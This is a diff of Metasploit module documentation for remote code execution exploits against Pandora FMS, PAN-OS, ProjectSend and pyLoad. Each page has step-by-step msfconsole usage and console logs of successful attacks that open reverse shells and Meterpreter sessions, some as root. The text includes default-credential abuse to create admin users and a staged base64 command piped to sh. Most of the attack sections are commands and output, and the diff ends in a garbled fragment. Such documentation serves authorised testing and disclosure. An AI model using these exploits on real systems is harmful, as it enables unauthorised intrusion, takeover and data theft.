+[*] Running command: echo -n " openssl enc -base64 -d))|sh" >> /tmp/fglGT
+[+] Command staged; command execution requires a timeout and will take a few seconds.
+[*] Running command: cat /tmp/fglGT | sh && rm /tmp/fglGT
+[*] Client 192.168.137.205 requested /qv_gAdz7yjcgH-ohM3GesA
+[*] Sending payload to 192.168.137.205 (curl/7.68.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.137.205
+[*] Meterpreter session 10 opened (192.168.137.204:4444 -> 192.168.137.205:58030) at 2024-11-11 22:37:40 -0500
+[*] Check thy shell.
+
+meterpreter > sysinfo
+Computer     : 192.168.137.205
+OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+```
@@ -0,0 +1,210 @@
+## Vulnerable Application
+Pandora FMS is a monitoring solution that provides full observability for your organization's technology.
+This module exploits an command injection vulnerability in the LDAP authentication mechanism of Pandora FMS.
+You need have admin access at the Pandora FMS Web application in order to execute this RCE.
+This access can be achieved leveraging a default password vulnerability in Pandora FMS that allows an attacker
+to access the Pandora FMS MySQL database, create a new admin user and gain administrative access to the
+Pandora FMS Web application.
+This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world.
+This issue affects Community, Free and Enterprise editions: from `v7.0NG.718` through <= `v7.0NG.777.4`
+
+The following releases were tested.
+
+**Pandora FMS Releases:**
+* Pandora FMS Community Edition v7.0NG.718 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.759 (CentOS 7 ISO image)
+* Pandora FMS Community Edition v7.0NG.777-LTS (Ubuntu 22.04)
+* Pandora FMS Community Edition v7.0NG.772-LTS (Ubuntu 22.04)
+
+## Installation steps to install Pandora FMS Community, Free or Enterprise Editions
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download [Pandora FMS iso](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/).
+* Install the iso image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options.
+* Boot up the VM and should be able to access the Pandora FMS appliance either thru the console, `ssh` on port `22`
+* or via the `webui` via `http://your_ip/pandora_console/index.php`.
+
+* Note: from version `v7.0NG.760` follow the installation manual below:
+* [Non ISO installation](https://pandorafms.com/manual/!current/en/documentation/pandorafms/installation/01_installing).
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/linux/http/pandora_fms_auth_rce_cve_2024_11320`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### USERNAME
+This option is optional and is the username (default: admin) to authenticate with the Pandora FMS application.
+
+### PASSWORD
+This option is optional and is the password (default: pandora) in plain text to authenticate with the Pandora FMS application.
+
+### DB_USER
+This option is required and is the username (default: pandora) to authenticate with the Pandora FMS MySQL database.
+
+### DB_PASSWORD
+This option is required and is the password (default: Pandor4!) in plain text to authenticate with the Pandora FMS MySQL database.
+Note: In older versions, this password is set to `pandora` during installation of the application.
+
+### DB_PORT
+This option is required and is the MySQL database port (default: 3306) to connect to the database.
+
+## Scenarios
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > info
+
+       Name: Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password
+     Module: exploit/linux/http/pandora_fms_auth_rce_cve_2024_11320
+   Platform: Unix, Linux, PHP
+       Arch: cmd, php
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-11-21
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Askar mhaskar
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP Command
+      1   Unix/Linux Command
+
+Check supported:
+  Yes
+
+Basic options:
+  Name         Current Setting      Required  Description
+  ----         ---------------      --------  -----------
+  DB_NAME      pandora              yes       Pandora database
+  DB_PASSWORD  Pandor4!             yes       Pandora database admin password
+  DB_PORT      3306                 yes       MySQL database port
+  DB_USER      pandora              yes       Pandora database admin user
+  PASSWORD     pandora              no        Pandora web admin password
+  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
+                                              g-metasploit.html
+  RPORT        80                   yes       The target port (TCP)
+  SSL          false                no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI    /pandora_console     yes       Path to the Pandora FMS application
+  USERNAME     admin                no        Pandora web admin user
+  VHOST                             no        HTTP server virtual host
+
+Payload information:
+
+Description:
+  Pandora FMS is a monitoring solution that provides full observability for your organization's
+  technology. This module exploits an command injection vulnerability in the LDAP authentication
+  mechanism of Pandora FMS.
+  You need have admin access at the Pandora FMS Web application in order to execute this RCE.
+  This access can be achieved leveraging a default password vulnerability in Pandora FMS that
+  allows an attacker to access the Pandora FMS MySQL database, create a new admin user and gain
+  administrative access to the Pandora FMS Web application. This attack can be remotely executed
+  over the WAN as long as the MySQL services are exposed to the outside world.
+  This issue affects Community, Free and Enterprise editions: from v7.0NG.718 through <= v7.0NG.777.4
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-11320
+  https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/
+  https://attackerkb.com/topics/CsDUaLijbT/cve-2024-11320
+
+View the full module info with the info -d command.
+```
+### Pandora FMS v7.0NG.777 on Ubuntu 22.04 -  PHP Command target
+Attack scenario: use the default database credentials (pandora:Pandor4!) to create an admin user in the application
+to gain the privileges for the RCE.
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set password xxx
+password => xxx
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > exploit
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Pandora FMS version v7.0NG.777
+[*] Trying to log in with admin credentials admin:xxx at the Pandora FMS Web application.
+[*] Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.
+[*] Creating new admin user with credentials cnrjq:jeQsinXxfe for access at the Pandora FMS Web application.
+[*] Trying to log in with new admin credentials cnrjq:jeQsinXxfe at the Pandora FMS Web application.
+[*] Succesfully authenticated at the Pandora FMS Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing PHP Command for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.6
+[*] Meterpreter session 28 opened (192.168.201.8:4444 -> 192.168.201.6:59242) at 2024-12-22 10:35:05 +0000
+[+] Payload is successful removed from LDAP configuration.
+
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www/html/pandora_console
+meterpreter >
+```
+###  Pandora FMS v7.0NG.777 on Ubuntu 22.04 - Unix/Linux Command target
+Attack scenario: use the default admin credentials (admin:pandora) of the Pandora FMS application
+to gain the privileges for the RCE.
+```msf
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set target 1
+target => 1
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > set password pandora
+password => pandora
+msf6 exploit(linux/http/pandora_fms_auth_rce_cve_2024_11320) > exploit
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Pandora FMS version v7.0NG.777
+[*] Trying to log in with admin credentials admin:pandora at the Pandora FMS Web application.
+[*] Succesfully authenticated at the Pandora FMS Web application.
+[*] Saving admin credentials at the msf database.
+[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
+[*] Command shell session 29 opened (192.168.201.8:4444 -> 192.168.201.6:37616) at 2024-12-22 10:57:58 +0000
+[+] Payload is successful removed from LDAP configuration.
+
+pwd
+/var/www/html/pandora_console
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux cuckoo 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+## Limitations
+In older versions of Pandora FMS, you might run into error 'Unable to login from this host due to policy' if you try to connect
+to the MySQL database with the default database credentials.
+This is caused by the restrictive host settings at the MySQL database which is default set to `localhost` and `127.0.0.1`.
+You can check this with the SQL command below if you have local access to the database.
+```
+SELECT host FROM mysql.user WHERE user = "pandora";
+-----------+
+| host      |
+-----------+
+| 127.0.0.1 |
+| localhost |
+-----------+
+```
+In newer versions of Pandora FMS, this has been changed to '%' which allow any host to connect to the database.
@@ -0,0 +1,113 @@
+## Vulnerable Application
+This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection
+vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can
+execute arbitrary code with root privileges.
+
+The following versions are affected:
+  * PAN-OS 11.2 (up to and including 11.2.4-h1)
+  * PAN-OS 11.1 (up to and including 11.1.5-h1)
+  * PAN-OS 11.0 (up to and including 11.0.6-h1)
+  * PAN-OS 10.2 (up to and including 10.2.12-h2)
+
+## Testing
+Install a new PAN-OS instance as a VM in VMWare, by downloading an OVA for a vulnerable version, for example
+`PA-VM-ESX-11.1.4.ova`. Install this OVA in VMWare Workstation and boot the device. The first ethernet adapter
+will be assigned an IP address via DHCP. This is the IP address of the management interface. You can complete setup
+by visiting `https://MANAGEMENT_IP/` in your browser. You do not need to license the target VM in order to successfully
+run the exploit against the target. The default user is `admin` with a password of `admin`, and you will be instructed
+to change this upon logging in for the first time.
+
+The exploit has been tested against PAN-OS `10.2.8` and `11.1.4`, with the
+payloads `cmd/linux/http/x64/meterpreter_reverse_tcp`, `md/linux/http/x64/meterpreter/reverse_tcp`,
+and `cmd/unix/reverse_bash`.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/panos_management_unauth_rce`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+5. `set LPORT 4444`
+6. `check`
+7. `exploit`
+
+## Options
+
+### WRITABLE_DIR
+The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
+payload as a series of chunks to this location, before executing the payload. The written artifacts are then deleted.
+
+## Scenarios
+
+### Default
+
+```
+msf6 exploit(linux/http/panos_management_unauth_rce) > show options
+
+Module options (exploit/linux/http/panos_management_unauth_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.86.100   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         443              yes       The target port (TCP)
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                          no        HTTP server virtual host
+   WRITABLE_DIR  /var/tmp         yes       The full path of a writable directory on the target.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      pHLZiKRnmfR      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/panos_management_unauth_rce) > check
+[+] 192.168.86.100:443 - The target is vulnerable.
+msf6 exploit(linux/http/panos_management_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Uploading payload chunk 1 of 7...
+[*] Uploading payload chunk 2 of 7...
+[*] Uploading payload chunk 3 of 7...
+[*] Uploading payload chunk 4 of 7...
+[*] Uploading payload chunk 5 of 7...
+[*] Uploading payload chunk 6 of 7...
+[*] Uploading payload chunk 7 of 7...
+[*] Amalgamating payload chunks...
+[*] Executing payload...
+[*] Sending stage (3045380 bytes) to 192.168.86.100
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.100
+OS           : Red Hat  (Linux 4.18.0-240.1.1.28.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+ProjectSend is a web application used for sharing files with clients.
+
+Due to POST parameters being executed before checking user permissions,
+it is possible to perform a series of actions that can result in unauthenticated Remote Code Execution (RCE)
+on vulnerable versions of ProjectSend.
+
+This module has been tested against ProjectSend versions r1295 through r1605 on Linux.
+
+The easiest way to obtain a vulnerable version of ProjectSend is by deploying it using Docker, as pre-made images exist for the software.
+The following Docker Compose file can be used to set up a vulnerable environment.
+
+```
+---
+    services:
+      projectsend:
+        image: lscr.io/linuxserver/projectsend:version-r1605
+        container_name: projectsend
+        environment:
+          - PUID=1000
+          - PGID=1000
+          - TZ=Etc/UTC
+          - MAX_UPLOAD=5000
+        volumes:
+          - ./projectsend/config:/config
+          - ./projectsend/data:/data
+        ports:
+          - 80:80
+        restart: unless-stopped
+      db:
+        image: mariadb
+        restart: unless-stopped
+        container_name: db
+        volumes:
+          - ./mariadb_data:/var/lib/mysql
+        environment:
+          MYSQL_ROOT_PASSWORD: password
+          MYSQL_DATABASE: projectsend
+          MYSQL_USER: projectsend
+          MYSQL_PASSWORD: projectsend
+```
+After launching the containers, ProjectSend requires an initial configuration,
+which can be completed by accessing it via port 80 on localhost.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/projectsend_unauth_rce`
+4. Set remote hosts: `set RHOSTS <ip>`
+5. Set remote port: `set RPORT <port>`
+6. Set the path to ProjectSend: `set TARGETURI <URI>`
+7. Set local host: `set LHOST <local ip>`
+8. Do: `run`
+9. You should get a shell
+
+```
+msf6 exploit(linux/http/projectsend_unauth_rce) > options
+
+Module options (exploit/linux/http/projectsend_unauth_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The TARGETURI for ProjectSend
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.20     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP Command
+```
+
+## Options
+N/A - Only default options.
+
+## Scenarios
+```
+msf6 exploit(linux/http/projectsend_unauth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.20:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Client registration successfully enabled
+[+] User alvin.padberg created with password lrASo3iM
+[*] Disabling upload restrictions...
+[*] Logging in as alvin.padberg...
+[+] Logged in as alvin.padberg
+[+] Successfully uploaded PHP file: sX1A4FCH.php
+[*] Sending stage (39927 bytes) to 192.168.1.20
+[*] Meterpreter session 1 opened (192.168.1.20:4444 -> 192.168.1.20:56675) at 2024-09-23 19:01:29 +0200
+[*] Logging in as alvin.padberg...
+[+] Logged in as alvin.padberg
+[+] Client registration successfully disabled
+[*] Enabling upload restrictions...
+
+meterpreter > sysinfo
+Computer    : 1480205e55c2
+OS          : Linux 1480205e55c2 6.6.26-linuxkit #1 SMP Sat Apr 27 04:13:19 UTC 2024 aarch64
+Meterpreter : php/linux
+```
@@ -0,0 +1,147 @@
+## Vulnerable Application
+CVE-2024-28397 is sandbox escape in js2py (<=0.74) which is a popular python package that can evaluate
+javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference
+to a python object in the js2py environment enabling them to escape the sandbox, bypass pyimport restrictions
+and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74
+is the latest version of js2py which was released Nov 6, 2022.
+
+CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source
+download manager designed to automate file downloads from various online sources. Pyload is vulnerable because
+it exposes the vulnerable js2py functionality mentioned above on the /flash/addcrypted2 API endpoint.
+This endpoint was designed to only accept connections from localhost but by manipulating the HOST header we
+can bypass this restriction in order to access the API to achieve unauth RCE.
+
+## Verification Steps
+
+1. Start a vulnerable instance of pyLoad using docker
+2. Start msfconsole
+3. Run: `use exploit/linux/http/pyload_js2py_cve_2024_39205`
+4. Set the `RHOST`, `LHOST` `PAYLOAD` and payload associated options
+5. Run: `run`
+
+### Docker Setup
+
+```
+docker run -d \
+  --name=pyload-ng \
+  -e PUID=1000 \
+  -e PGID=1000 \
+  -e TZ=Etc/UTC \
+  -p 8000:8000 \
+  -p 9666:9666 \
+  --restart unless-stopped \
+  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev85
+```
+
+## Scenarios
+### ARCH_CMD PyLoad 0.5.0b3.dev85 (with js2py 0.74)
+```
+msf6 > use linux/http/pyload_js2py_cve_2024_39205
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > options
+
+Module options (exploit/linux/http/pyload_js2py_cve_2024_39205):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      9666             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      FTdcATmGGDpa     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:56080) at 2024-11-12 15:47:19 -0800
+
+meterpreter > getruid
+[-] Unknown command: getruid. Did you mean getuid? Run the help command for more details.
+meterpreter > getuid
+Server username: abc
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           :  (Linux 6.10.11-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### ARCH_X64 PyLoad 0.5.0b3.dev85 (with js2py 0.74)
+```
+msf6 > use linux/http/pyload_js2py_cve_2024_39205
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set target 1
+target => 1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:56088) at 2024-11-12 15:48:42 -0800
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+
+meterpreter > getuid
+Server username: abc
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           :  (Linux 6.10.11-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .1.5
 .2.5